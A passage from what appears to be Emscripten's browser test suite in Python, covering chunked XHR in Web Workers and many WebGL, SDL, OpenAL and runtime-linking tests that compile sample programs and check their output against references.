xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file(c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([test_file('hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('glbook', 'Common'),
test_file('glbook', 'Common', 'esUtil.c'),
test_file('glbook', 'Common', 'esShader.c'),
test_file('glbook', 'Common', 'esShapes.c'),
test_file('glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_third]', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_set]', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_set]', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest('emscripten_fs_api_browser.cpp', '1', args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=0"])
self.btest('emscripten_fs_api_browser2.cpp', '1', args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest('emscripten_main_loop.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0']
]:
self.btest('emscripten_main_loop_settimeout.cpp', '1', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_and_blocker.cpp', '0', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp', 0)
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest('sdl_quit.c', '1', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by dEQP text suite (we can remove it later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest('sdlglshader2.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
self.btest('gl_matrix_identity.c', expected=['-1882984448', '460451840', '1588195328', '2411982848'], args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_sync_compilation
def test_cubegeom_pre_relocatable(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-s', 'RELOCATABLE'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'GL_DEBUG', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # some coverage for GL_DEBUG not breaking the build
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre3(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre3.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@parameterized({
'': ([],),
'tracing': (['-sTRACE_WEBGL_CALLS'],),
})
@requires_graphics_hardware
def test_cubegeom(self, args):
# proxy only in the simple, normal case (we can't trace GL calls when
# proxied)
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'] + args, also_proxied=not args)
@requires_graphics_hardware
def test_cubegeom_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-DUSE_REGAL', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=True)
@requires_threads
@requires_graphics_hardware
def test_cubegeom_regal_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '-g', '-pthread', '-DUSE_REGAL', '-s', 'USE_PTHREADS', '-s', 'USE_REGAL', '-lGL', '-lSDL'], also_proxied=False)
@requires_graphics_hardware
def test_cubegeom_proc(self):
create_file('side.c', r'''
extern void* SDL_GL_GetProcAddress(const char *);
void *glBindBuffer = 0; // same name as the gl function, to check that the collision does not break us
void *getBindBuffer() {
if (!glBindBuffer) glBindBuffer = SDL_GL_GetProcAddress("glBindBuffer");
return glBindBuffer;
}
''')
# also test -Os in wasm, which uses meta-dce, which should not break legacy gl emulation hacks
for opts in [[], ['-O1'], ['-Os']]:
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_proc.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=opts + ['side.c', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_glew(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_glew.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom.png'), args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lGLEW', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_color(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap(self): # draw is given a direct pointer to clientside memory, no element array buffer
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_normal_dap_far(self): # indices do nto start from 0
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_range(self): # glDrawRangeElements
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_range.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_normal_dap_far_glda(self): # use glDrawArrays
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_firefox('fails on CI but works locally')
def test_cubegeom_normal_dap_far_glda_quad(self): # with quad
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_normal_dap_far_glda_quad.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_mt(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_mt.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_mt.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL']) # multitexture
@requires_graphics_hardware
def test_cubegeom_color2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_color2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_color2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_cubegeom_texturematrix(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_texturematrix.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_fog(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_fog.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_fog.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_regal(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'USE_REGAL', '-DUSE_REGAL', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre2_vao(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_pre2_vao2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre2_vao2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
@no_swiftshader
def test_cubegeom_pre_vao_es(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao_es.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_pre_vao.png'), args=['-s', 'FULL_ES2=1', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cubegeom_u4fv_2(self):
self.btest(os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.c'), reference=os.path.join('third_party', 'cubegeom', 'cubegeom_u4fv_2.png'), args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_cube_explosion(self):
self.btest('cube_explosion.c', reference='cube_explosion.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_glgettexenv(self):
self.btest('glgettexenv.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], expected=['1'])
def test_sdl_canvas_blank(self):
self.btest('sdl_canvas_blank.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_blank.png')
def test_sdl_canvas_palette(self):
self.btest('sdl_canvas_palette.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_palette.png')
def test_sdl_canvas_twice(self):
self.btest('sdl_canvas_twice.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_twice.png')
def test_sdl_set_clip_rect(self):
self.btest('sdl_set_clip_rect.c', args=['-lSDL', '-lGL'], reference='sdl_set_clip_rect.png')
def test_sdl_maprgba(self):
self.btest('sdl_maprgba.c', args=['-lSDL', '-lGL'], reference='sdl_maprgba.png', reference_slack=3)
def test_sdl_create_rgb_surface_from(self):
self.btest('sdl_create_rgb_surface_from.c', args=['-lSDL', '-lGL'], reference='sdl_create_rgb_surface_from.png')
def test_sdl_rotozoom(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_rotozoom.c', reference='sdl_rotozoom.png', args=['--preload-file', 'screenshot.png', '--use-preload-plugins', '-lSDL', '-lGL'], reference_slack=3)
def test_sdl_gfx_primitives(self):
self.btest('sdl_gfx_primitives.c', args=['-lSDL', '-lGL'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl_canvas_palette_2(self):
create_file('pre.js', '''
Module['preRun'].push(function() {
SDL.defaults.copyOnLock = false;
});
''')
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-r.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-g.js', '-lSDL', '-lGL'])
self.btest('sdl_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['--pre-js', 'pre.js', '--pre-js', 'args-b.js', '-lSDL', '-lGL'])
def test_sdl_ttf_render_text_solid(self):
self.btest('sdl_ttf_render_text_solid.c', reference='sdl_ttf_render_text_solid.png', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_alloctext(self):
self.btest('sdl_alloctext.c', expected='1', args=['-O2', '-s', 'INITIAL_MEMORY=16MB', '-lSDL', '-lGL'])
def test_sdl_surface_refcount(self):
self.btest('sdl_surface_refcount.c', args=['-lSDL'], expected='1')
def test_sdl_free_screen(self):
self.btest('sdl_free_screen.cpp', args=['-lSDL', '-lGL'], reference='htmltest.png')
@requires_graphics_hardware
def test_glbegin_points(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('glbegin_points.c', reference='glbegin_points.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_s3tc(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_s3tc_ffp_only(self):
shutil.copyfile(test_file('screenshot.dds'), 'screenshot.dds')
self.btest('s3tc.c', reference='s3tc.png', args=['--preload-file', 'screenshot.dds', '-s', 'LEGACY_GL_EMULATION', '-s', 'GL_FFP_ONLY', '-lGL', '-lSDL'])
@no_chrome('see #7117')
@requires_graphics_hardware
def test_aniso(self):
shutil.copyfile(test_file('water.dds'), 'water.dds')
self.btest('aniso.c', reference='aniso.png', reference_slack=2, args=['--preload-file', 'water.dds', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '-Wno-incompatible-pointer-types'])
@requires_graphics_hardware
def test_tex_nonbyte(self):
self.btest('tex_nonbyte.c', reference='tex_nonbyte.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_float_tex(self):
self.btest('float_tex.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_subdata(self):
self.btest('gl_subdata.cpp', reference='float_tex.png', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_perspective(self):
self.btest('perspective.c', reference='perspective.png', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_glerror(self):
self.btest('gl_error.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION', '-lGL'])
def test_openal_error(self):
for args in [
[],
['-lopenal', '-s', 'STRICT'],
['--closure=1']
]:
print(args)
self.btest('openal_error.c', expected='1', args=args)
def test_openal_capture_sanity(self):
self.btest('openal_capture_sanity.c', expected='0')
def test_runtimelink(self):
create_file('header.h', r'''
struct point
{
int x, y;
};
''')
create_file('supp.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x + p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
''')
create_file('main.cpp', r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
return suppInt;
}
''')
self.run_process([EMCC, 'supp.cpp', '-o', 'supp.wasm', '-s', 'SIDE_MODULE', '-O2', '-s', 'EXPORT_ALL'])
